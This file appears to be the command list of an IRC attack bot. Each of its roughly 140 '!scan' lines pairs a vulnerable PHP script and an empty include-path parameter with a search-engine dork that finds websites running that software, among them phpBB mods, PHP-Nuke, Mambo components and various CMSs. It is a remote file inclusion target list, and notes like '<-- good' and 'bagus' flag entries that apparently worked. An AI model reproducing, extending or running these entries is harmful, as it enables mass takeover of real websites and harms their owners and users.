!scan eshow.php?Config_rootdir= "powered by Albinator"
!scan auction/auction_common.php?phpbb_root_path= intext:"phpbb - auction"
!scan auction/auction_common.php?phpbb_root_path= inurl:auction
!scan visible_count_inc.php?statitpath= inurl:visible
!scan index.php?inc_dir= "Powered by TotalCalendar"
!scan /phpdig/includes/config.php?relative_script_path= "JetBox CMS"
!scan embed/day.php?path= intitle:"Login to Calendar"
!scan includes/dbal.php?eqdkp_root_path= "powered by EQdkp"
!scan claroline/auth/ldap/authldap.php?includePath= Dokeos
!scan /direct.php?rf= "ActualScripts, Company. All rights reserved."
!scan /config.php?returnpath= "PHPListPro ?2001-2006 SmartISoft"
!scan addsite.php?returnpath= "PHPListPro ?2001-2006 SmartISoft"
!scan auth/auth.php?phpbb_root_path= phpRaid
!scan auth/auth_phpbb/phpbb_root_path= phpRaid
!scan includes/pafiledb_constants.php?module_root_path= PafileDB
!scan index.php?phpbb_root_path= "Powered by foing"
!scan extras/poll/poll.php?file_newsportal= "TR Newsportal" brought by TRanx.
!scan cart_content.php?cart_isp_root= inurl:/squirrelcart/
!scan ezusermanager_pwd_forgott.php?ezUserManager_Path= "powered by ezUserManager"
!scan includes/class_template.php?quezza_root_path= "Quezza BB"
!scan sources/news.php?CONFIG[main_path]= "Powered By ScozNews"
!scan classified_right.php?language_dir= phpbazar
!scan cron.php?ROOT_PATH= "powered by phpmydirectory"
!scan cron.php?ROOT_PATH= intext:"2001-2006 phpMyDirectory.com"
!scan reconfig.php?GLOBALS[CLPath]= "CaLogic Calendars"
!scan srxclr.php?GLOBALS[CLPath]= "CaLogic Calendars"
!scan sources/post.php?fil_config= "Fusion News"
!scan addpost_newpoll.php?addpoll=preview&thispath= allinurl:/ubbthreads/
!scan BE_config.php?_PSL[classdir]= "Back-End CMS"
!scan /index.php?site_path= "Powered by SocketMail"
!scan vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]= V-Webmail
!scan includes/mailaccess/pop3.php?CONFIG[pear_dir]= V-Webmail
!scan DOCEBO205/modules/credits/help.php?lang= "Docebo LMS"
!scan cached.php3?GLOBALS[AA_INC_PATH]= "APC ActionApps"
!scan jsview.php3?GLOBALS[AA_INC_PATH]= "APC ActionApps"
!scan auth.php3?GLOBALS[AA_INC_PATH]= "APC ActionApps"
!scan manager/frontinc/prepend.php?_PX_config[manager_path]= "Plume CMS"
!scan admin/lib_action_step.php?GLOBALS[CLASS_PATH]= "Hot Open Tickets"
!scan p-popupgallery.php?l= "F@cile Interactive Web"
!scan ubbt.inc.php?GLOBALS[thispath]= UBBThreads
!scan ubbt.inc.php?thispath= UBBThreads
!scan language/lang_english/lang_activity.php?phpbb_root_path= Activity MOD Plus phpBB
!scan blend_data/blend_common.php?phpbb_root_path= "Blend Portal"
!scan suche/search.php?config[fsBase]= "Fastpublish CMS"
!scan drucken.php?config[fsBase]= "Fastpublish CMS"
!scan includes/common.php?root_path= gnopaste
!scan error.php?default_path= "Ottoman CMS"
!scan app/edocument/edocument_basic_view_menu.php?system_path= metajour
!scan app/eproject/eproject_basic_view_menu.php?system_path= metajour
!scan app/erek/erek_basic_view_menu.php?system_path= metajour
!scan extension/article/article.class.php?system_path= metajour
!scan extension/search/search.class.php?system_path= metajour
!scan admin/menu.php?root_path= "AssoCIateD CMS"
!scan includes/webdav/server.php?bhconfig[bhfilepath]= Bytehoard
!scan include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]= "Redaxo CMS"
!scan class/Wiki/Wiki.php?c_node[class_path]= Igloo
!scan ashheadlines.php?pathtoashnews= "powered by ashnews"
!scan ashnews.php?pathtoashnews= "powered by ashnews"
!scan admin/common-menu.php?CONF[local_path]= Informium
!scan modules/Forums/admin/index.php?phpbb_root_path= PHP-Nuke
!scan modules/Forums/admin/admin_words.php?phpbb_root_path= PHP-Nuke
!scan modules/Forums/admin/admin_smilies.php?phpbb_root_path= PHP-Nuke
!scan modules/Forums/admin/admin_users.php?phpbb_root_path= "PHP-Nuke"
!scan applications/faq/Bs_Faq.class.php?APP[path][applications]= "BlueShoes Framework"
!scan applications/filemanager/file.php?APP[path][core]= "BlueShoes Framework"
!scan inc/logincheck.inc.php?path= Webspotblogging
!scan inc/global.php?path= Webspotblogging
!scan classes/phpmailer/class.cs_phpmailer.php?classes_dir= Powered by CS-Cart - Shopping Cart Software
!scan /index.php?file_path= "dotwidget Printer-friendly"
!scan /includes/common.inc?file_path= "dotwidget Printer-friendly"
!scan /auth.cookie.inc.php?da_path= "powered by DreamAccount"
!scan /auth.header.inc.php?da_path= "powered by DreamAccount"
!scan _wk/wk_lang.php?WK[wkPath]= Wikiwig
!scan contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]= OpenEMR
!scan sources/post.php?fil_config= Xtreme/Ditto News
!scan class/jpcache/jpcache.php?_PSL[classdir]= "Back-end CMS"
!scan dialogs/td.php?spaw_root= cms-bandits
!scan dialogs/img.php?spaw_root= cms-bandits
!scan footer.php?absolutepath= "Enterprise Payroll Systems"
!scan admin/footer.php?absolutepath= "Enterprise Payroll Systems"
!scan phpcodecabinet_directory/include/Beautifier/Core.php?BEAUT_PATH= PHPCodeCabinet
!scan calendar.php?cfg_dir= "Visual Events Calendar" <-- good
!scan includes/usercp_register.php?phpbb_root_path= ZoneX 1.0.3 - Publishers Gold Edition <-- good
!scan lib/auth.inc.php?INIT_PATH= docpile:we
!scan article-raw.php?file_newsportal= phNNTP
!scan genpage-cgi.php?REP_INC= Hitweb
!scan CheckUpload.php?Language= "Cwfm-0.9.1"
!scan boitenews4/index.php?url_index= "Boite de News"
!scan common.inc.php?CFG[libdir]= "PgMarket"
!scan owimg.php3?path= "See-Commerce"
!scan tags.php?BBCodeFile= Tagger
!scan examples/image.php?image= "powered by twg"
!scan examples/examples/image.php2?image= "powered by twg"
!scan include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:"phpwcms/index.php?id="
!scan src/Login.php?page= "Spaminator"
!scan config.php?root_path= Thatware <--- bagus
!scan index.php?page= SaveWebPortal
!scan inc/header.inc.php?ficStyle= phpPrintAnalyzer
!scan Classes/Event_for_month.php?_BASE= Chaussette
!scan install/install3.php?database=none&cabsolute_path= "WEBInsta Mailing list manager"
!scan BaseLoader.php?glConf[path_libraries]= MVCnPHP
!scan includes/session.php?wb_class_dir= Wheatblog
!scan index.php?templates_dir= "WEBinsta CMS" <-- bagus
!scan common.php?rootdir= projectbutler
!scan inc/indexhead.php?fileloc= discloser
!scan modules/usersonline/users.php?module_dir= "WEBinsta CMS" <-- bagus
!scan lib/specialdays.php?path_pre= "PHProjekt"
!scan lib/dbman_filter.inc.php?lib_path= "PHProjekt"
!scan classes/query.class.php?baseDir= dotProject
!scan include/urights.php?CRM_inc= Outreach Project Tool
!scan system/includes/pageheaderdefault.inc.php?_sysSessionPath= IRSR - Invisionix Roaming System Remote
!scan s03.php?shopid= powergap
!scan administrator/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path= inurl:"/com_mtree/"
!scan administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= inurl:"com_a6mambocredits"
!scan handlers/email/mod.listmail.php?_PM_[path][handler]= PHlyMail Lite
!scan app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= phpCodeGenie
!scan administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path= inurl:"com_kochsuite"
!scan plugins/1_Adressbuch/delete.php?folder= Sonium Enterprise Adressbook
!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= com_cropimage
!scan admin/autoprompter.php?CONFIG[BASE_PATH]= Cce-interact
!scan includes/common.inc.php?CONFIG[BASE_PATH]= Cce-interact
!scan include/novalib/class.novaEdit.mysql.php?TNLIB_DIR= Tutti Nova
!scan news.php?CONFIG[script_path]= Fantastic News
!scan include/yapbb_session.php?GLOBALS[includeBit]=devilteam&cfgIncludeDirectory= YapBB
!scan local/lib/lcUser.php?LIBDIR= "Local Calendar"
!scan ?langage= EPNadmin
!scan themes/program/themesettings.inc.php?themesdir= "Segue CMS"
!scan lib/rs.php?rootpath= CASTOR
!scan phpcalendar/includes/setup.php?phpc_root_path= Virtual Law Office